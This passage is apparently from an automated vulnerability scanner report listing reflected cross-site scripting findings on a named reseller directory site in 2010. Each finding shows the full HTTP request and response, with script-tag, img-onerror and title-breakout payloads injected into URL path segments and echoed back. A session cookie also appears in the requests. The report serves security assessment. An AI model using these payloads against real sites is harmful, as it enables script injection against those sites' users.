Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag3e111<script>alert(1)</script>62c9d4d91768b83c4/software?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3e111<script>alert(1)</script>62c9d4d91768b83c4/software?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4416. http://www.resellerbase.com/tag/software [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/software

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48654<script>alert(1)</script>39ae5c9e4f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag48654<script>alert(1)</script>39ae5c9e4f0/software HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag48654<script>alert(1)</script>39ae5c9e4f0/software was not found on this server.</p>
...[SNIP]...

2.4417. http://www.resellerbase.com/tag/software [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d8e<img%20src%3da%20onerror%3dalert(1)>d4852d1bf8ccf59b5 was submitted in the REST URL parameter 2. This input was echoed as c4d8e<img src=a onerror=alert(1)>d4852d1bf8ccf59b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/softwarec4d8e<img%20src%3da%20onerror%3dalert(1)>d4852d1bf8ccf59b5?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: softw
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : softwarec4d8e<img src=a onerror=alert(1)>d4852d1bf8ccf59b5]</td>
...[SNIP]...

2.4418. http://www.resellerbase.com/tag/software [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 185d2</title><img%20src%3da%20onerror%3dalert(1)>e4c64d673c2206548 was submitted in the REST URL parameter 2. This input was echoed as 185d2</title><img src=a onerror=alert(1)>e4c64d673c2206548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/software185d2</title><img%20src%3da%20onerror%3dalert(1)>e4c64d673c2206548?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: software185d2</title><img src=a onerror=alert(1)>e4c64d673c2206548</title>
...[SNIP]...

2.4419. http://www.resellerbase.com/tag/software [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 518ce<img%20src%3da%20onerror%3dalert(1)>0fb2302f70e was submitted in the REST URL parameter 2. This input was echoed as 518ce<img src=a onerror=alert(1)>0fb2302f70e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/software518ce<img%20src%3da%20onerror%3dalert(1)>0fb2302f70e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: softw
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : software518ce<img src=a onerror=alert(1)>0fb2302f70e]</td>
...[SNIP]...

2.4420. http://www.resellerbase.com/tag/software [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d268b</title><img%20src%3da%20onerror%3dalert(1)>368004f9793 was submitted in the REST URL parameter 2. This input was echoed as d268b</title><img src=a onerror=alert(1)>368004f9793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/softwared268b</title><img%20src%3da%20onerror%3dalert(1)>368004f9793 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: softwared268b</title><img src=a onerror=alert(1)>368004f9793</title>
...[SNIP]...

2.4421. http://www.resellerbase.com/tag/ssl+certificates [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ssl+certificates

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3022e<script>alert(1)</script>1d8d657470a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3022e<script>alert(1)</script>1d8d657470a/ssl+certificates HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3022e<script>alert(1)</script>1d8d657470a/ssl+certificates was not found on this server.</p>
...[SNIP]...

2.4422. http://www.resellerbase.com/tag/survey [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/survey

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db791<script>alert(1)</script>4695bc771d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagdb791<script>alert(1)</script>4695bc771d2/survey HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagdb791<script>alert(1)</script>4695bc771d2/survey was not found on this server.</p>
...[SNIP]...

2.4423. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0bb0"><script>alert(1)</script>b16b1aadbc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf0bb0"><script>alert(1)</script>b16b1aadbc9/tag/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 44026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/tagf0bb0"><script>alert(1)</script>b16b1aadbc9/tag/adult/" style="color: ">
...[SNIP]...

2.4424. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b3c5<img%20src%3da%20onerror%3dalert(1)>20e97a918e7 was submitted in the REST URL parameter 2. This input was echoed as 1b3c5<img src=a onerror=alert(1)>20e97a918e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/tag1b3c5<img%20src%3da%20onerror%3dalert(1)>20e97a918e7/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag1b
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : tag1b3c5<img src=a onerror=alert(1)>20e97a918e7/adult]</td>
...[SNIP]...

2.4425. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 113f1</title><img%20src%3da%20onerror%3dalert(1)>3a0a96bbae4 was submitted in the REST URL parameter 2. This input was echoed as 113f1</title><img src=a onerror=alert(1)>3a0a96bbae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/tag113f1</title><img%20src%3da%20onerror%3dalert(1)>3a0a96bbae4/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag113f1</title><img src=a onerror=alert(1)>3a0a96bbae4/adult</title>
...[SNIP]...

2.4426. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b7b47</title><img%20src%3da%20onerror%3dalert(1)>2d6a0a61370 was submitted in the REST URL parameter 3. This input was echoed as b7b47</title><img src=a onerror=alert(1)>2d6a0a61370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/tag/adultb7b47</title><img%20src%3da%20onerror%3dalert(1)>2d6a0a61370/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/adultb7b47</title><img src=a onerror=alert(1)>2d6a0a61370</title>
...[SNIP]...

2.4427. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbc11<img%20src%3da%20onerror%3dalert(1)>0f8a21275c1 was submitted in the REST URL parameter 3. This input was echoed as dbc11<img src=a onerror=alert(1)>0f8a21275c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/tag/adultdbc11<img%20src%3da%20onerror%3dalert(1)>0f8a21275c1/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/a
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : tag/adultdbc11<img src=a onerror=alert(1)>0f8a21275c1]</td>
...[SNIP]...

2.4428. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload e8fd2</title><img%20src%3da%20onerror%3dalert(1)>97650c9064a was submitted in the REST URL parameter 4. This input was echoed as e8fd2</title><img src=a onerror=alert(1)>97650c9064a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/tag/adult/e8fd2</title><img%20src%3da%20onerror%3dalert(1)>97650c9064a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:57:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/adult/e8fd2</title><img src=a onerror=alert(1)>97650c9064a</title>
...[SNIP]...

2.4429. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b8f9<img%20src%3da%20onerror%3dalert(1)>b04b54dd823 was submitted in the REST URL parameter 4. This input was echoed as 5b8f9<img src=a onerror=alert(1)>b04b54dd823 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/tag/adult/5b8f9<img%20src%3da%20onerror%3dalert(1)>b04b54dd823 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/a
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : tag/adult/5b8f9<img src=a onerror=alert(1)>b04b54dd823]</td>
...[SNIP]...

2.4430. http://www.resellerbase.com/tag/telephone [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/telephone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51ba4<script>alert(1)</script>b6e3ddcb59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag51ba4<script>alert(1)</script>b6e3ddcb59/telephone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag51ba4<script>alert(1)</script>b6e3ddcb59/telephone was not found on this server.</p>
...[SNIP]...

2.4431. http://www.resellerbase.com/tag/telephone [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/telephone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2337d<script>alert(1)</script>032fdf081353ffd98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag2337d<script>alert(1)</script>032fdf081353ffd98/telephone?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/telephone
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2337d<script>alert(1)</script>032fdf081353ffd98/telephone?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4432. http://www.resellerbase.com/tag/telephone [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/telephone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce5fe<img%20src%3da%20onerror%3dalert(1)>dd6e6c23a78 was submitted in the REST URL parameter 2. This input was echoed as ce5fe<img src=a onerror=alert(1)>dd6e6c23a78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/telephonece5fe<img%20src%3da%20onerror%3dalert(1)>dd6e6c23a78 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: telep
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : telephonece5fe<img src=a onerror=alert(1)>dd6e6c23a78]</td>
...[SNIP]...

2.4433. http://www.resellerbase.com/tag/telephone [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/telephone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b1135</title><img%20src%3da%20onerror%3dalert(1)>0633fcc96a6 was submitted in the REST URL parameter 2. This input was echoed as b1135</title><img src=a onerror=alert(1)>0633fcc96a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

